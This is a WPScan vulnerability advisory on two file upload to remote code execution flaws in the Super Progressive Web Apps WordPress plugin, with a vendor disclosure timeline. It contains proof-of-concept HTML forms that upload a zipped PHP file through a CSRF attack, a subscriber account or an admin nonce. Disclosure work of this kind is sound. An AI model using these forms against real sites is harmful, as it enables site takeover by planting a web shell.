The WPScan WordPress security research team identified two serious vulnerabilities affecting the Super Progressive Web Apps WordPress plugin, affecting over 50,000+ WordPress websites. Our users were warned about these vulnerabilities on June 29th, 2021 when they were added to our database.
Authenticated (subscriber+) Arbitrary File Upload to RCE
Description
When the plugin’s Apple Touch Icons & Splash Screen add-on was active, its superpwa_splashscreen_uploader AJAX action did not properly check for Cross-Site Request Forgery (CSRF) attacks, authorisation or the contents of the uploaded archive file. This allowed attackers to upload an archive with a PHP file within it, leading to Remote Code Execution (RCE), by either using a low privilege account (subscriber+) or conducting a CSRF attack against an authenticated user.
The vulnerability was added to our database on June 29th and can be found here: https://wpscan.com/vulnerability/4fd989ae-db35-40fa-ba61-b2d4fbb3994d
Proof of Concept (PoC)
- Log on to the blog (with the
Apple Touch Icons & Splash Screenadd-on activated) as a low privilege user (such as subscriber). - Save the code below in an HTML file (and replace the example.com by the correct domain) then open it in the same browser used to log on to the blog.
- Select an archive of a PHP file and click
Upload. - The uploaded file will be output to https://example.com/wp-content/uploads/superpwa-splashIcons/
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
Zipped PHP File
<input type="file" name="file"/><br/><br/>
<input type="submit" value="Upload"/>
</form>
</body>
Remediation
The author of the plugin patched the vulnerability in version 2.1.12 after we worked with them to fix the vulnerability.
Authenticated (admin+) Arbitrary File Upload to RCE
Description
When the plugin’s Apple Touch Icons & Splash Screen add-on was active, the plugin does not validate that the uploaded archive only contains images, allowing administrator users to upload arbitrary PHP files. Although by default WordPress administrator users are already permitted to upload arbitrary files to their websites, in some situations, for example where custom capabilities are used, this may not be intended.
The vulnerability was added to our database on June 29th and can be found here: https://wpscan.com/vulnerability/4fd989ae-db35-40fa-ba61-b2d4fbb3994d
Proof of Concept (PoC)
- Log on to the blog (with the
Apple Touch Icons & Splash Screenadd-on activated) as an administrator user. - Grab the nonce via the source of /wp-admin/admin.php?page=superpwa-apple-icons, ie
var superpwaIosScreen = {"nonce":"XXXXXXXX"}; - Save the code below in an HTML file (replace the example.com by the correct domain), then open it in the same browser used to log on to the blog, add the nonce grabbed earlier and select an archive of a PHP file.
- The PHP file from the archive will be extracted and put in
https://example.com/wp-content/uploads/superpwa-splashIcons/
<html>
<body>
<form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
Zipped PHP File
<input type="file" name="file"/><br/><br/>
Nonce (Login as admin and get it from the source of /wp-admin/admin.php?page=superpwa-apple-icons: "var superpwaIosScreen = {"nonce":"XXXXXXXX"};")<br/>
<input type="text" name="security_nonce"><br/><br/>
<input type="submit" value="Upload"/>
</form>
</body>
Remediation
The author of the plugin patched the vulnerability in version 2.1.12 after we worked with them to fix the vulnerability.
Timeline
- April 9th, 2021 – Vendor contacted via https://superpwa.com/contact/
- April 10th, 2021 – Vendor replied, full details sent. Progression tracked via https://github.com/SuperPWA/Super-Progressive-Web-Apps/issues/178
- April 17th, 2021 – v2.1.9 released, no fix
- May 10th, 2021 – v2.1.10 released, no fix
- May 17th, 2021 – v2.1.11 released, only fixing the CSRF logic, still allowing high privilege account to upload arbitrary PHP files via an archive, and using nonce as authorisation check. Vendor contacted to make them add the capability check and ensure that the uploaded zip archive is checked for malicious files BEFORE being unzipped
- May 18th, 2021 – Vendor replied that they fixed the issue and sent a dev version for review
- After review, the fix was found to delete non
pngandhtmlfiles from the archive AFTER the archive is being unzipped, still allowing the issue to be exploited via a race condition attack, and as malicious html files are allowed to be uploaded, it could also lead to XSS. Vendor notified about it and given a piece of code to check if an archive only contain files with specific extensions (https://github.com/wpscanteam/wpscan/wiki/Useful-Functions-for-Plugin-and-Theme-Security#zip_only_contains_allowed_extensions) - May 20th, 2021 – Vendor replied that they will implement the remediations given
- May 29th, 2021 – v2.1.12 released, adding the capability check and attempting to delete all non
pngandhtmlfiles after the archive is unzipped. However, the checked folder is not the correct one (/wp-content/uploads/superpwa-splashIcons/super_splash_screens/instead of/wp-content/uploads/superpwa-splashIcons/). Even if the correct folder was checked for malicious files, the issue would still be exploitated via a race condition attack (see therace_condition.rbalong this report) - June 15th, 2021 – v2.1.13 released, fixing the issue
- June 29th, 2021 – Added to the public WPScan WordPress Vulnerability Database
We would like to thank the plugin author for working with us to ensure WordPress users are secure.
